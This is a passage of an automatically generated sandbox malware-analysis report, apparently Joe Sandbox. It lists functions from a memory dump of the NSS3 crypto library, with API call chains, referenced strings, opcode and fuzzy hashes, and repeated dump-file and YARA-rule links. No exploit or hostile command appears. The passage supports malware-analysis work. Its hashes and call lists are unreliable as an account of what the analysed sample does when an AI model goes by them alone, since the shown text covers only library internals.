PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAF2AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6CAF2B0D
PK11_FreeSymKey.NSS3(?), ref: 6CAF2B7B
PK11_FreeSymKey.NSS3(?), ref: 6CAF2BD6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 1c43e1865a6b255956e993f1c0aaaf68c9645ef8a9698aadfec99188e1a982f4
Instruction ID: f1647cf40fbf58cac3a91272c2b19a6907e4a8603fa681fa6fe52a4db49c593e
Opcode Fuzzy Hash: 1c43e1865a6b255956e993f1c0aaaf68c9645ef8a9698aadfec99188e1a982f4
Instruction Fuzzy Hash: 955127B1E002459BEB109E65DC85BAE77B5AF4431CF190224FD299B781E731E88BC791

Function 6CAD8B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD8B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6CAD8BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CAD8D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD8D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD8D72

Strings

OID., xrefs: 6CAD8BA4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: 04de8a6711d22b6e1704eecca0fd3c33ef5ac0d49d0301c334b2ae3f7a3234aa
Instruction ID: 72ce99878d46583dbf8deb07c2f77c067d22451e896bcef8f1f1cfed3304e98a
Opcode Fuzzy Hash: 04de8a6711d22b6e1704eecca0fd3c33ef5ac0d49d0301c334b2ae3f7a3234aa
Instruction Fuzzy Hash: 385127B1B051288BCB20CE18DC8079EB3A4EB55748F0A55AAE919DB781D334BDC5CBD4

Function 6CA96980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6CA95DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA95DEC
Part of subcall function 6CA95DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CA95E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA969BA

Part of subcall function 6CADFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA89003,?), ref: 6CADFD91
Part of subcall function 6CADFD80: PORT_Alloc_Util.NSS3(A4686CAE,?), ref: 6CADFDA2
Part of subcall function 6CADFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAE,?,?), ref: 6CADFDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CA96A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA96AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA96ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA96AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA96AE9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 8ba4ebdedc6f83361221dace008705fb08eed0019abba33b61491e60948ecfb5
Instruction ID: bb1dec2772f00eaaeefabc40b17111ad94cf1f97b3e3674f7a5086f1d6e9616b
Opcode Fuzzy Hash: 8ba4ebdedc6f83361221dace008705fb08eed0019abba33b61491e60948ecfb5
Instruction Fuzzy Hash: A241CDB1A506049BEB508F64EC46B9BB7F9BF44354F188438E85AC7740EF31E9458BE1

Function 6CAE89A0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6CAE89DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAE89EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAE8A04

Part of subcall function 6CAEBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CAE800A,00000000,?,00000000,?), ref: 6CAEBC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6CAE8A47
PK11_GetInternalKeySlot.NSS3 ref: 6CAE8A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6CAE8A96

Part of subcall function 6CACF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CACF854
Part of subcall function 6CACF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CACF868
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CACF882
Part of subcall function 6CACF820: free.MOZGLUE(04C483FF,?,?), ref: 6CACF889
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CACF8A4
Part of subcall function 6CACF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CACF8AB
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CACF8C9
Part of subcall function 6CACF820: free.MOZGLUE(280F10EC,?,?), ref: 6CACF8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAE8AD4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID:
API String ID: 3389286309-0
Opcode ID: 719c448a23c74304c6a2183401f26bf9b798d0c92145bcc50a3a8945327ee90d
Instruction ID: 2dd71769b3c79ab673aad31f653f46371ede94e401eb847e2e0235fe00ebdfa1
Opcode Fuzzy Hash: 719c448a23c74304c6a2183401f26bf9b798d0c92145bcc50a3a8945327ee90d
Instruction Fuzzy Hash: 8A41E9756003147FD7009E59DD81B6B7768EB48718F09412AFD1887B42E732E998D7E3

Function 6CACAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CACAB3E,?,?,?), ref: 6CACAC35

Part of subcall function 6CAACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAACF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CACAB3E,?,?,?), ref: 6CACAC55

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CACAB3E,?,?), ref: 6CACAC70

Part of subcall function 6CAAE300: TlsGetValue.KERNEL32 ref: 6CAAE33C
Part of subcall function 6CAAE300: EnterCriticalSection.KERNEL32(?), ref: 6CAAE350
Part of subcall function 6CAAE300: PR_Unlock.NSS3(?), ref: 6CAAE5BC
Part of subcall function 6CAAE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CAAE5CA
Part of subcall function 6CAAE300: TlsGetValue.KERNEL32 ref: 6CAAE5F2
Part of subcall function 6CAAE300: EnterCriticalSection.KERNEL32(?), ref: 6CAAE606
Part of subcall function 6CAAE300: PORT_Alloc_Util.NSS3(?), ref: 6CAAE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CACAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CACAB3E), ref: 6CACACD7
PORT_Alloc_Util.NSS3(?), ref: 6CACAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CACAD2B

Part of subcall function 6CAAF360: TlsGetValue.KERNEL32(00000000,?,6CACA904,?), ref: 6CAAF38B
Part of subcall function 6CAAF360: EnterCriticalSection.KERNEL32(?,?,?,6CACA904,?), ref: 6CAAF3A0
Part of subcall function 6CAAF360: PR_Unlock.NSS3(?,?,?,?,6CACA904,?), ref: 6CAAF3D3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: a75c0287168f7b0a7ef31b6c6c44040715ba6e4e39d72e05973ca760bc582fb8
Instruction ID: 93f7bf7b961b4ac4b8cba4f0351ce25d78d86855d9a6a4c202222314421eb51b
Opcode Fuzzy Hash: a75c0287168f7b0a7ef31b6c6c44040715ba6e4e39d72e05973ca760bc582fb8
Instruction Fuzzy Hash: 9A3117B1F046055FEB049FA9CC409BF7777AF8472CB188128E8159B740EB31DD9687A2

Function 6CA82920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA8294E

Part of subcall function 6CAE1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CA81D97,?,?), ref: 6CAE1836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA8296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA82991

Part of subcall function 6CAE1820: PR_SetError.NSS3(FFFFE005,00000000,?,6CA81D97,?,?), ref: 6CAE184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA829AF
PR_Now.NSS3 ref: 6CA82A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA82A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA82A79

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: b94be3a2d6e817bc44f7c91dac46ff56ce915455efaa0ad24ea04196ac9a3d5d
Instruction ID: 5eeeedaadcc08f85a8f9cfd979d27d98f3587ca9afe13d69e12cb3bebf2806de
Opcode Fuzzy Hash: b94be3a2d6e817bc44f7c91dac46ff56ce915455efaa0ad24ea04196ac9a3d5d
Instruction Fuzzy Hash: D741A071A093559FC710CE68C940A6FF3E9AFD8714F098A2DF99893300E734E949CB92

Function 6CAA8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CAA8C7C

Part of subcall function 6CB49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DC6
Part of subcall function 6CB49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DD1
Part of subcall function 6CB49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB49DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA8CB0
TlsGetValue.KERNEL32 ref: 6CAA8CD1
EnterCriticalSection.KERNEL32(?), ref: 6CAA8CE5
PR_Unlock.NSS3(?), ref: 6CAA8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAA8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA8D93

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 96e5ca4d884216f22b9cd3e8efc05314487ae68b1ca62dc39aad911fdac55598
Instruction ID: 3843ced61bc566074b2e7cd87e391f7ef31b2e32ea3a046c8cad2be12cf236df
Opcode Fuzzy Hash: 96e5ca4d884216f22b9cd3e8efc05314487ae68b1ca62dc39aad911fdac55598
Instruction Fuzzy Hash: 52316A71A01641AFE700AFA8DC407EAB7B4FF05318F18013AEA1967B50E735A9A5CBC1

Function 6CAA2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CA9E728,?,00000038,?,?,00000000), ref: 6CAA2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAA2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAA2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CAA2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CAA2E9E
PR_Unlock.NSS3(?), ref: 6CAA2EAB
PR_Unlock.NSS3(?), ref: 6CAA2F0D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 9ebe05bd1a8242376b5234bd1dceba534322413d761ef1a7169210b6543a0b41
Instruction ID: 38f20504fca34e828a0ee372a2f09eb96f6510c6ef93bf65c8c9cd9390b42bfd
Opcode Fuzzy Hash: 9ebe05bd1a8242376b5234bd1dceba534322413d761ef1a7169210b6543a0b41
Instruction Fuzzy Hash: 6731E7B5A00505ABEB005F69EC4487ABB79FF49259B188264ED1CC7611EB31ECF5C7E0

Function 6CAECEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CAECD93,?), ref: 6CAECEEE

Part of subcall function 6CAE14C0: TlsGetValue.KERNEL32 ref: 6CAE14E0
Part of subcall function 6CAE14C0: EnterCriticalSection.KERNEL32 ref: 6CAE14F5
Part of subcall function 6CAE14C0: PR_Unlock.NSS3 ref: 6CAE150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAECD93,?), ref: 6CAECEFC

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAECD93,?), ref: 6CAECF0B

Part of subcall function 6CAE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAECD93,?), ref: 6CAECF1D

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CAECD93,?,?,?,?,?,?,?,?,?,?,?,6CAECD93,?), ref: 6CAECF78

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: ac723c47339efdedf914acb21e75762a4e032992053db14b8e50b98e019366b0
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 4811C0B1A003005BEB04AB6A6D41B7BB9EC9F4C14DF084439AD09D7742FB70DA48A6F1

Function 6CA98C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA98C1B
EnterCriticalSection.KERNEL32 ref: 6CA98C34
PL_ArenaAllocate.NSS3 ref: 6CA98C65
PR_Unlock.NSS3 ref: 6CA98C9C
PR_Unlock.NSS3 ref: 6CA98CB6

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

Strings

KRAM, xrefs: 6CA98C8F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 009e4b5cd876c885a6d21c7d8d837f5e790206f952bfc5c21d679a66ca46ef24
Instruction ID: b2fc72dc9f1c0bb78decd7490756a7447e772b32fd6549ad3ec8e8387c306e43
Opcode Fuzzy Hash: 009e4b5cd876c885a6d21c7d8d837f5e790206f952bfc5c21d679a66ca46ef24
Instruction Fuzzy Hash: DC219CB1A15A018FD700AF78C485569BBF4FF05304F05896ED888CB711EB39E8C9CB92

Function 6CB92C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB92CA0
PR_ExitMonitor.NSS3 ref: 6CB92CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CB92CD1
strdup.MOZGLUE(?), ref: 6CB92CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CB92D27

Strings

Loaded library %s (static lib), xrefs: 6CB92D22

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: bdbf0067d9fc60584ea503cdffc3050317a6e251912a131fcbd1e28130699572
Instruction ID: a06a86ac77e167676f12e997cdc4fe1390c22248505dfe7e2b4f8939fd20fac3
Opcode Fuzzy Hash: bdbf0067d9fc60584ea503cdffc3050317a6e251912a131fcbd1e28130699572
Instruction Fuzzy Hash: 0D1108B5B012909FEB508F24D84466A77B8EB4A75DF18843DD809C7B42D731E848CBA3

Function 6CA868E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA868FB
EnterCriticalSection.KERNEL32 ref: 6CA86913
PORT_FreeArena_Util.NSS3 ref: 6CA8693E
PR_Unlock.NSS3 ref: 6CA86946
DeleteCriticalSection.KERNEL32 ref: 6CA86951
free.MOZGLUE ref: 6CA8695D
PR_Unlock.NSS3 ref: 6CA86968

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

